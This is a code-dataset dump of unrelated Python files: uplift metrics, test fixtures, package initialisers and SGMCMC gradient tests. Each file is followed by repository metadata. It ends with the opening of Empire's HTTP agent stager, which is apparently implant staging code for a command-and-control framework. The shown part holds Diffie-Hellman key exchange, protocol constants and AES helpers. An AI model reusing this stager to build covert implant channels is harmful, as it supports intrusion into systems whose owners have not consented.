plot(df, kind='qini', n=n, figsize=figsize, outcome_col=outcome_col, treatment_col=treatment_col,
treatment_effect_col=treatment_effect_col, normalize=normalize, random_seed=random_seed)
def auuc_score(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau', normalize=True):
"""Calculate the AUUC (Area Under the Uplift Curve) score.
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
Returns:
(float): the AUUC score
"""
cumgain = get_cumgain(df, outcome_col, treatment_col, treatment_effect_col, normalize)
return cumgain.sum() / cumgain.shape[0]
def qini_score(df, outcome_col='y', treatment_col='w', treatment_effect_col='tau', normalize=True):
"""Calculate the Qini score: the area between the Qini curves of a model and random.
For details, see Radcliffe (2007), `Using Control Group to Target on Predicted Lift:
Building and Assessing Uplift Models`
Args:
df (pandas.DataFrame): a data frame with model estimates and actual data as columns
outcome_col (str, optional): the column name for the actual outcome
treatment_col (str, optional): the column name for the treatment indicator (0 or 1)
treatment_effect_col (str, optional): the column name for the true treatment effect
normalize (bool, optional): whether to normalize the y-axis to 1 or not
Returns:
(float): the Qini score
"""
qini = get_qini(df, outcome_col, treatment_col, treatment_effect_col, normalize)
return (qini.sum(axis=0) - qini[RANDOM_COL].sum()) / qini.shape[0]
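# Illustrative end-to-end sketch (not part of the original module): score a
# random "model" on synthetic data. Including a true-effect column 'tau' keeps
# both estimators on the exact-effect code path; all numbers are assumptions.
if __name__ == '__main__':
    rng = np.random.RandomState(42)
    df_demo = pd.DataFrame({'model': rng.rand(1000),
                            'y': rng.binomial(1, 0.5, 1000),
                            'w': rng.binomial(1, 0.5, 1000),
                            'tau': rng.normal(0.1, 1.0, 1000)})
    print(auuc_score(df_demo))
    print(qini_score(df_demo))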
| 46.011628 | 114 | 0.688148 | 2,298 | 15,828 | 4.618799 | 0.086162 | 0.089033 | 0.072923 | 0.03844 | 0.875636 | 0.860467 | 0.853966 | 0.831826 | 0.822593 | 0.822593 | 0 | 0.009812 | 0.220874 | 15,828 | 343 | 115 | 46.145773 | 0.850876 | 0.578153 | 0 | 0.436364 | 0 | 0 | 0.061422 | 0 | 0 | 0 | 0 | 0 | 0.027273 | 1 | 0.081818 | false | 0 | 0.036364 | 0 | 0.163636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8a4b31ceac3c808a44db96d402dab6e0defd6a9a | 20 | py | Python | virtual/lib/python3.6/site-packages/pylint/test/regrtest_data/wildcard.py | drewheathens/The-Moringa-Tribune | 98ee4d63c9df6f1f7497fc6876960a822d914500 | [
"MIT"
] | 463 | 2015-01-15T08:17:42.000Z | 2022-03-28T15:10:20.000Z | virtual/lib/python3.6/site-packages/pylint/test/regrtest_data/wildcard.py | drewheathens/The-Moringa-Tribune | 98ee4d63c9df6f1f7497fc6876960a822d914500 | [
"MIT"
] | 52 | 2015-01-06T02:43:59.000Z | 2022-03-14T11:15:21.000Z | virtual/lib/python3.6/site-packages/pylint/test/regrtest_data/wildcard.py | drewheathens/The-Moringa-Tribune | 98ee4d63c9df6f1f7497fc6876960a822d914500 | [
"MIT"
] | 249 | 2015-01-07T22:49:49.000Z | 2022-03-18T02:32:06.000Z | from empty import *
| 10 | 19 | 0.75 | 3 | 20 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 20 | 1 | 20 | 20 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8a5ea175f297869f9ed46e6e0b9d5f17eaf5f804 | 89 | py | Python | src/python/stup/ring/__init__.py | Wizmann/STUP-Protocol | e06a3442082e5061d2be32be3ffd681675e7ffb5 | [
"MIT"
] | 14 | 2017-05-06T10:14:32.000Z | 2018-07-17T02:58:00.000Z | src/python/stup/ring/__init__.py | Wizmann/STUP-Protocol | e06a3442082e5061d2be32be3ffd681675e7ffb5 | [
"MIT"
] | 2 | 2017-06-13T05:40:18.000Z | 2017-06-13T16:23:01.000Z | src/python/stup/ring/__init__.py | Wizmann/STUP-Protocol | e06a3442082e5061d2be32be3ffd681675e7ffb5 | [
"MIT"
] | 4 | 2017-06-09T20:20:54.000Z | 2018-07-17T02:58:10.000Z | #coding=utf-8
from .buffer import *
from .window import *
from .container.item import *
| 14.833333 | 29 | 0.730337 | 13 | 89 | 5 | 0.692308 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013333 | 0.157303 | 89 | 5 | 30 | 17.8 | 0.853333 | 0.134831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8ab1deccf00c19cf05eafb4ebc9e32a689914006 | 152 | py | Python | mayan/apps/folders/tests/literals.py | nadwiabd/insight_edms | 90a09d7ca77cb111c791e307b55a603e82042dfe | [
"Apache-2.0"
] | 1 | 2020-07-15T02:56:02.000Z | 2020-07-15T02:56:02.000Z | mayan/apps/folders/tests/literals.py | kyper999/mayan-edms | ca7b8301a1f68548e8e718d42a728a500d67286e | [
"Apache-2.0"
] | null | null | null | mayan/apps/folders/tests/literals.py | kyper999/mayan-edms | ca7b8301a1f68548e8e718d42a728a500d67286e | [
"Apache-2.0"
] | 2 | 2020-02-24T21:02:31.000Z | 2021-01-05T23:52:01.000Z | from __future__ import absolute_import, unicode_literals
TEST_FOLDER_LABEL = 'test folder label'
TEST_FOLDER_EDITED_LABEL = 'test folder edited label'
| 30.4 | 56 | 0.842105 | 21 | 152 | 5.571429 | 0.47619 | 0.34188 | 0.384615 | 0.324786 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111842 | 152 | 4 | 57 | 38 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0.269737 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
76fb550626136b4595fa8dfbdb8d64cd8e6640e4 | 5,955 | py | Python | tests/test_gradient_estimation.py | ColCarroll/SGMCMCJax | de1dbf234577fa46ecc98c7c7de4ef547cef52ea | [
"Apache-2.0"
] | null | null | null | tests/test_gradient_estimation.py | ColCarroll/SGMCMCJax | de1dbf234577fa46ecc98c7c7de4ef547cef52ea | [
"Apache-2.0"
] | null | null | null | tests/test_gradient_estimation.py | ColCarroll/SGMCMCJax | de1dbf234577fa46ecc98c7c7de4ef547cef52ea | [
"Apache-2.0"
] | null | null | null | import jax.numpy as jnp
import numpy as np
import pytest
from jax import random
from models import X_data, loglikelihood_array, logprior_array
from sgmcmcjax.gradient_estimation import (
build_gradient_estimation_fn,
build_gradient_estimation_fn_CV,
build_gradient_estimation_fn_SVRG,
)
from sgmcmcjax.types import PRNGKey, PyTree, SamplerState, SVRGState
from sgmcmcjax.util import build_grad_log_post
Ndata, D = X_data.shape
data = (X_data,)
params = jnp.zeros(D)
def test_fullbatch_standard_estimator():
"Check that the standard estimator with fullbatch data returns the exact gradient"
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
batch_size = X_data.shape[0]
estimate_gradient, init_gradient = build_gradient_estimation_fn(
grad_log_post, data, batch_size
)
key = random.PRNGKey(0)
mygrad, svrg_state = estimate_gradient(0, key, jnp.zeros(D))
assert jnp.array_equal(mygrad, grad_log_post(params, *data))
assert svrg_state == SVRGState()
def test_standard_estimator_shape():
"Check shapes for the standard estimator"
params = jnp.zeros(D)
batch_size = int(0.1 * X_data.shape[0])
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
estimate_gradient_standard, init_gradient = build_gradient_estimation_fn(
grad_log_post, data, batch_size
)
mygrad, svrg_state = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert svrg_state == SVRGState()
mygrad, svrg_state = estimate_gradient_standard(0, random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert svrg_state == SVRGState()
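# Usage sketch (illustrative, mirrors the pattern exercised by the tests above):
# each builder returns an (estimate_gradient, init_gradient) pair, and the
# estimator is called with (iteration, PRNGKey, params). The batch size is an
# arbitrary assumption here.
def _example_standard_estimator():
    grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
    estimate_gradient, init_gradient = build_gradient_estimation_fn(
        grad_log_post, data, batch_size=10
    )
    mygrad, svrg_state = estimate_gradient(0, random.PRNGKey(0), params)
    return mygrad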
def test_CV_standard_estimator():
"Check shapes for the CV estimator"
params = jnp.zeros(D)
batch_size = int(0.1 * X_data.shape[0])
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
estimate_gradient_CV, init_gradient = build_gradient_estimation_fn_CV(
grad_log_post, data, batch_size, params
)
mygrad, svrg_state = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert svrg_state == SVRGState()
mygrad, svrg_state = estimate_gradient_CV(0, random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert svrg_state == SVRGState()
def test_SVRG_estimator_shape():
"Check shapes for the SVRG estimator"
batch_size = int(0.1 * X_data.shape[0])
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
centering_value = params
update_rate = 100
estimate_gradient_SVRG, init_gradient = build_gradient_estimation_fn_SVRG(
grad_log_post, data, batch_size, update_rate
)
mygrad, svrg_state = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert jnp.array_equal(svrg_state.centering_value, params)
mygrad, svrg_state = estimate_gradient_SVRG(
0, random.PRNGKey(0), params, svrg_state
)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
assert jnp.array_equal(svrg_state.centering_value, params)
# ======
# Check that having data as numpy arrays doesn't raise a `TracerArrayConversionError`
def test_standard_estimator_data_np_array():
"Standard estimator: check that having data as numpy arrays doesn't raise a `TracerArrayConversionError`"
params = jnp.zeros(D)
batch_size = int(0.1 * X_data.shape[0])
data = (np.array(X_data),)
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
estimate_gradient_standard, init_gradient = build_gradient_estimation_fn(
grad_log_post, data, batch_size
)
mygrad, state_svrg = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
mygrad, state_svrg = estimate_gradient_standard(
0, random.PRNGKey(0), params, state_svrg
)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
def test_CV_data_np_array():
"CV estimator: check that having data as numpy arrays doesn't raise a `TracerArrayConversionError`"
params = jnp.zeros(D)
batch_size = int(0.1 * X_data.shape[0])
data = (np.array(X_data),)
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
estimate_gradient_CV, init_gradient = build_gradient_estimation_fn_CV(
grad_log_post, data, batch_size, params
)
mygrad, state_svrg = init_gradient(random.PRNGKey(0), params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
mygrad, state_svrg = estimate_gradient_CV(0, random.PRNGKey(0), params, state_svrg)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
def test_SVRG_data_np_array():
"SVRG estimator: check that having data as numpy arrays doesn't raise a `TracerArrayConversionError`"
batch_size = int(0.1 * X_data.shape[0])
data = (np.array(X_data),)
grad_log_post = build_grad_log_post(loglikelihood_array, logprior_array, data)
centering_value = params
update_rate = 100
estimate_gradient, init_gradient = build_gradient_estimation_fn_SVRG(
grad_log_post, data, batch_size, update_rate
)
key = random.PRNGKey(0)
mygrad, state_svrg = init_gradient(key, params)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
mygrad, state_svrg = estimate_gradient(0, random.PRNGKey(0), params, state_svrg)
assert type(mygrad) == type(params)
assert jnp.shape(mygrad) == jnp.shape(params)
| 38.668831 | 109 | 0.732662 | 829 | 5,955 | 4.984318 | 0.089264 | 0.075508 | 0.061229 | 0.058083 | 0.839061 | 0.790658 | 0.768151 | 0.768151 | 0.759439 | 0.759439 | 0 | 0.009096 | 0.16927 | 5,955 | 153 | 110 | 38.921569 | 0.826157 | 0.098237 | 0 | 0.587302 | 0 | 0 | 0.082921 | 0.014332 | 0 | 0 | 0 | 0 | 0.253968 | 1 | 0.055556 | false | 0 | 0.063492 | 0 | 0.119048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0a03a91cf647654e3f3983b873a54494132b534b | 116 | py | Python | sources/algorithms/queries/__init__.py | tipech/OverlapGraph | 0aa132802f2e174608ce33c6bfc24ff14551bf4a | [
"MIT"
] | null | null | null | sources/algorithms/queries/__init__.py | tipech/OverlapGraph | 0aa132802f2e174608ce33c6bfc24ff14551bf4a | [
"MIT"
] | 1 | 2018-10-07T08:06:01.000Z | 2018-10-07T08:06:01.000Z | sources/algorithms/queries/__init__.py | tipech/OverlapGraph | 0aa132802f2e174608ce33c6bfc24ff14551bf4a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
from .enumerate import *
from .mrqenum import *
from .srqenum import *
from .rqenum import *
| 16.571429 | 24 | 0.724138 | 16 | 116 | 5.25 | 0.625 | 0.357143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163793 | 116 | 6 | 25 | 19.333333 | 0.865979 | 0.172414 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
0a06c5a0c7b812160d7a0ea884c2f42e4f1210d2 | 72,652 | py | Python | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | 3 | 2018-01-05T03:59:44.000Z | 2020-02-11T03:25:46.000Z | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | null | null | null | data/agent/stagers/http.py | lex0tanl/Empire | c8217e87cf333797eb363b782f769cc4b2f64b0b | [
"BSD-3-Clause"
] | 1 | 2018-07-31T15:57:02.000Z | 2018-07-31T15:57:02.000Z | #!/usr/bin/env python
# AES code from https://github.com/ricmoo/pyaes
# DH code from Directly from: https://github.com/lowazo/pyDHE
# See README.md for complete citations and sources
import copy
import sys
import struct
import os
import pwd
import hashlib
import random
import string
import hmac
import urllib2
import socket
import subprocess
from binascii import hexlify
LANGUAGE = {
'NONE' : 0,
'POWERSHELL' : 1,
'PYTHON' : 2
}
LANGUAGE_IDS = {}
for name, ID in LANGUAGE.items(): LANGUAGE_IDS[ID] = name
META = {
'NONE' : 0,
'STAGING_REQUEST' : 1,
'STAGING_RESPONSE' : 2,
'TASKING_REQUEST' : 3,
'RESULT_POST' : 4,
'SERVER_RESPONSE' : 5
}
META_IDS = {}
for name, ID in META.items(): META_IDS[ID] = name
STAGING = {
'NONE' : 0,
'STAGE0' : 1,
'STAGE1' : 2,
'STAGE2' : 3
}
STAGING_IDS = {}
for name, ID in STAGING.items(): STAGING_IDS[ID] = name
ADDITIONAL = {}
ADDITIONAL_IDS = {}
for name, ID in ADDITIONAL.items(): ADDITIONAL_IDS[ID] = name
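# The *_IDS dicts are reverse lookups, e.g. META_IDS[1] == 'STAGING_REQUEST',
# letting the agent translate numeric packet fields back to symbolic names.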
# Try to use a cryptographically secure random number generator; fall back to os.urandom if none is available.
try:
try:
import ssl
random_function = ssl.RAND_bytes
random_provider = "Python SSL"
except (AttributeError, ImportError):
import OpenSSL
random_function = OpenSSL.rand.bytes
random_provider = "OpenSSL"
except:
random_function = os.urandom
random_provider = "os.urandom"
class DiffieHellman(object):
"""
A reference implementation of the Diffie-Hellman protocol.
By default, this class uses the 6144-bit MODP Group (Group 17) from RFC 3526.
This prime is sufficient to generate an AES 256 key when used with
a 540+ bit exponent.
"""
def __init__(self, generator=2, group=17, keyLength=540):
"""
Generate the public and private keys.
"""
min_keyLength = 180
default_generator = 2
valid_generators = [2, 3, 5, 7]
        # Sanity check for generator and keyLength
if(generator not in valid_generators):
print("Error: Invalid generator. Using default.")
self.generator = default_generator
else:
self.generator = generator
if(keyLength < min_keyLength):
print("Error: keyLength is too small. Setting to minimum.")
self.keyLength = min_keyLength
else:
self.keyLength = keyLength
self.prime = self.getPrime(group)
self.privateKey = self.genPrivateKey(keyLength)
self.publicKey = self.genPublicKey()
def getPrime(self, group=17):
"""
Given a group number, return a prime.
"""
default_group = 17
primes = {
5: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF,
14: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF,
15: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF,
16: 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199FFFFFFFFFFFFFFFF,
17:
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF,
18:
0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E438777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851DF9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F924009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF
}
if group in primes.keys():
return primes[group]
else:
print("Error: No prime with group %i. Using default." % group)
return primes[default_group]
def genRandom(self, bits):
"""
Generate a random number with the specified number of bits
"""
_rand = 0
_bytes = bits // 8 + 8
while(len(bin(_rand))-2 < bits):
try:
_rand = int.from_bytes(random_function(_bytes), byteorder='big')
except:
_rand = int(random_function(_bytes).encode('hex'), 16)
return _rand
def genPrivateKey(self, bits):
"""
Generate a private key using a secure random number generator.
"""
return self.genRandom(bits)
def genPublicKey(self):
"""
Generate a public key X with g**x % p.
"""
return pow(self.generator, self.privateKey, self.prime)
def checkPublicKey(self, otherKey):
"""
Check the other party's public key to make sure it's valid.
Since a safe prime is used, verify that the Legendre symbol == 1
"""
if(otherKey > 2 and otherKey < self.prime - 1):
if(pow(otherKey, (self.prime - 1)//2, self.prime) == 1):
return True
return False
def genSecret(self, privateKey, otherKey):
"""
Check to make sure the public key is valid, then combine it with the
private key to generate a shared secret.
"""
if(self.checkPublicKey(otherKey) is True):
sharedSecret = pow(otherKey, privateKey, self.prime)
return sharedSecret
else:
raise Exception("Invalid public key.")
def genKey(self, otherKey):
"""
Derive the shared secret, then hash it to obtain the shared key.
"""
self.sharedSecret = self.genSecret(self.privateKey, otherKey)
# Convert the shared secret (int) to an array of bytes in network order
# Otherwise hashlib can't hash it.
try:
            # Byte length of the secret: drop bin()'s '0b' prefix, then round up.
            _sharedSecretBytes = self.sharedSecret.to_bytes(
                (len(bin(self.sharedSecret)) - 2) // 8 + 1, byteorder="big")
except AttributeError:
_sharedSecretBytes = str(self.sharedSecret)
s = hashlib.sha256()
s.update(bytes(_sharedSecretBytes))
self.key = s.digest()
def getKey(self):
"""
Return the shared secret key
"""
return self.key
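# Illustrative key-exchange sketch (added for clarity, not part of the stager's
# control flow): each side builds a DiffieHellman instance, exchanges publicKey
# values, then derives the same 32-byte AES key via genKey()/getKey().
def _example_dh_exchange():
    alice = DiffieHellman()
    bob = DiffieHellman()
    alice.genKey(bob.publicKey)
    bob.genKey(alice.publicKey)
    assert alice.getKey() == bob.getKey()
    return hexlify(alice.getKey())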
def _compact_word(word):
return (word[0] << 24) | (word[1] << 16) | (word[2] << 8) | word[3]
def _string_to_bytes(text):
return list(ord(c) for c in text)
def _bytes_to_string(binary):
return "".join(chr(b) for b in binary)
def _concat_list(a, b):
return a + b
def to_bufferable(binary):
return binary
def _get_byte(c):
return ord(c)
